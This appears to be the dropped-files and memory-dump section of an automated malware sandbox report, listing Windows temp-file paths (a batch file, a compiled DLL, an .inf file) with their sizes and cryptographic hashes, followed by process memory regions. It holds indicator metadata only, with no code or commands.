4acafe573b1ef9063ef434e44f72ba3e69d8b39834c13a11fc3c240cacfae71e45634829e31c1669ce842e2f7de0b11a4076142bcd3f185d6db5c67bbd64c2fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6b74cad8b09c70358b06c022fa6f6854

SHA1
ab2c10806ffa5507a5dee34cffb6b3a89c372952

SHA256
f0f7eab04a2c823c6b362f405ce2375061b7ba59dde09cb65fe5cc8af732fba6

SHA512
dcfd1caedc46d15ce5afa5a2c144d7ca9c9d54b54444c5683bd005ddd8e8f8e5750a0c6fe214ac8109856b492a45b1838e04a973b567a95c69622479d376bf5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESFED2.tmp

Filesize
1KB

MD5
ddd9a4a994684102a906bfe9c7a50c21

SHA1
c570254a52c5caa024f21e262a644f34423afeb5

SHA256
8b99c34fcb9730c7e9736dd5f1991fb63b30be8d0c78f05a9f0d4cf1032696b0

SHA512
bc240f48b4d6086bce4eb90039e9a36684391a3dd2f357afc5da306c07c8acd9860b84dff323a19f05a09c35d4a3e05286758b79ae3163b9054ddb65b20e939d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3iedf3t0.gve.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\n1.bat

Filesize
420KB

MD5
a21d4680c8d115c444119d6b1ca6aed6

SHA1
fdbb2d3c7eb9ea5c93781f91bf2157d25f82c2f2

SHA256
1f25a0b4e9b17c826aa68d775dab0605edbddf39963943358406285f157b4e9f

SHA512
b3b9ce5c820399bd7f8f80af4300328a5153ae8b15f2b00c85dba1fc983d02e739cae84ded8e831e845443e3226ff778c146598b0089076fcd9ac59830a47452

Download Submit
C:\Users\Admin\AppData\Local\Temp\pfuz2ljq\pfuz2ljq.dll

Filesize
4KB

MD5
5b7454d7d5b445f152cf779e2aaff9eb

SHA1
a170d89d6535bdedede8e626d3dfc6412a951a22

SHA256
7a06f0e3f6d3d7afd057410b910782be6f95b92a270402a1fe251232ad7ccb3e

SHA512
66be94f6a97672bb9c1a6a130a2f58b78e1c0d795bb97efab18e08f722286c6ac52fa97df36462e91eb802d8cf9143ed12896bfe9eef75c98a52cfd3fa63ce57

Download Submit
C:\windows\temp\oo0ksopp.inf

Filesize
675B

MD5
0a85805c6649ad8e6f40c9ddc1258a49

SHA1
69ca8a686c49218281a09bbed22ef55654a04459

SHA256
f20428b0f70a5fa861f27eef9583b473217ee467ef39f475d337f073851436be

SHA512
16775646f1df49f479e967c885e9948c52fcd31abc2041c63a50fd32e1380d3d963612d02f2db62e39c3bdcc959eb2d56f40d9f0f82a36897c8340206e355fad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pfuz2ljq\CSC9FCB6DB7B31043A58769A83D984227A3.TMP

Filesize
652B

MD5
bf308a9ba7149405847ba6c48477c1e6

SHA1
c2413bf537d33b50c6750c2603369402de927f6f

SHA256
ac2244a175f0e55489970718cf07b78b7b4b67a2155c01c9b0d64f2926125c64

SHA512
554f254584d9c28bbea5e0094477633bf19dc497fc9f80e00088bb974b1ebdb414e1e3112ee75000c756a4225236dcc01a8831a883fbf19a21bafa3e3646e3d9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pfuz2ljq\pfuz2ljq.0.cs

Filesize
2KB

MD5
b8f676e5e58a88c030c8437cf8c44510

SHA1
d2a94f790a3f41e2e207b6875c3215ad6788d902

SHA256
4580f48e57bafd774e5e2f48b8a7c67541f6cffd366fe702d1d414ca74abe1ab

SHA512
66af99543b3d818bcc700e32686067c8483135f94492f3e6f5a58c8d55ef6f4488052a9311d37fc822284f41b0eec0edfcf12beba4b91b62d42acc3578220b7e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pfuz2ljq\pfuz2ljq.cmdline

Filesize
369B

MD5
44fb6e2add1991d5ddcfedd7faab6d87

SHA1
49890976de9599f36620baad03f1ab4ec3454c1f

SHA256
e87367b998c9a18cf4b7f789627d6e3144b1caea2b5fab921fecc2463c29ddb4

SHA512
61b1e3a1590a023e2ae5e5fc844819b649f8b33cc723d5dbe5d99c9b90cdd13df475938b968dd7af17ae2ce8316fbda79438ab2ccb723679393a88ecc2b645d0

Download Submit
memory/2444-174-0x00000203E71E0000-0x00000203E71E1000-memory.dmp

Filesize
4KB

Download
memory/2444-176-0x00000203E71E0000-0x00000203E71E1000-memory.dmp

Filesize
4KB

Download
memory/2444-177-0x00000203E71E0000-0x00000203E71E1000-memory.dmp

Filesize
4KB

Download
memory/2444-178-0x00000203E71E0000-0x00000203E71E1000-memory.dmp

Filesize
4KB

Download
memory/2444-172-0x00000203E71E0000-0x00000203E71E1000-memory.dmp

Filesize
4KB

Download
memory/2444-175-0x00000203E71E0000-0x00000203E71E1000-memory.dmp

Filesize
4KB

Download
memory/2444-166-0x00000203E71E0000-0x00000203E71E1000-memory.dmp

Filesize
4KB

Download
memory/2444-173-0x00000203E71E0000-0x00000203E71E1000-memory.dmp

Filesize
4KB

Download
memory/2444-168-0x00000203E71E0000-0x00000203E71E1000-memory.dmp

Filesize
4KB

Download
memory/2444-167-0x00000203E71E0000-0x00000203E71E1000-memory.dmp

Filesize
4KB

Download
memory/3692-63-0x000001FBFB020000-0x000001FBFB096000-memory.dmp

Filesize
472KB

Download
memory/3692-74-0x000001FBFAFA0000-0x000001FBFAFF4000-memory.dmp

Filesize
336KB

Download
memory/3692-62-0x000001FBF8B90000-0x000001FBF8BD4000-memory.dmp

Filesize
272KB

Download
memory/3908-0-0x00007FFE642D3000-0x00007FFE642D5000-memory.dmp

Filesize
8KB

Download
memory/3908-13-0x00000221C17A0000-0x00000221C17BC000-memory.dmp

Filesize
112KB

Download
memory/3908-6-0x00000221C17C0000-0x00000221C17E2000-memory.dmp

Filesize
136KB

Download
memory/3908-43-0x00007FFE642D3000-0x00007FFE642D5000-memory.dmp

Filesize
8KB

Download
memory/3908-11-0x00007FFE642D0000-0x00007FFE64D91000-memory.dmp

Filesize
10.8MB

Download
memory/3908-12-0x00007FFE642D0000-0x00007FFE64D91000-memory.dmp

Filesize
10.8MB

Download
memory/3908-48-0x00007FFE642D0000-0x00007FFE64D91000-memory.dmp

Filesize
10.8MB

Download
memory/3908-26-0x00000221C1940000-0x00000221C1948000-memory.dmp

Filesize
32KB

Download
memory/3908-44-0x00007FFE642D0000-0x00007FFE64D91000-memory.dmp

Filesize
10.8MB

Download
memory/4116-144-0x0000000140000000-0x000000014007A000-memory.dmp

Filesize
488KB

Download
memory/4116-143-0x00000195B5920000-0x00000195B5976000-memory.dmp

Filesize
344KB

Download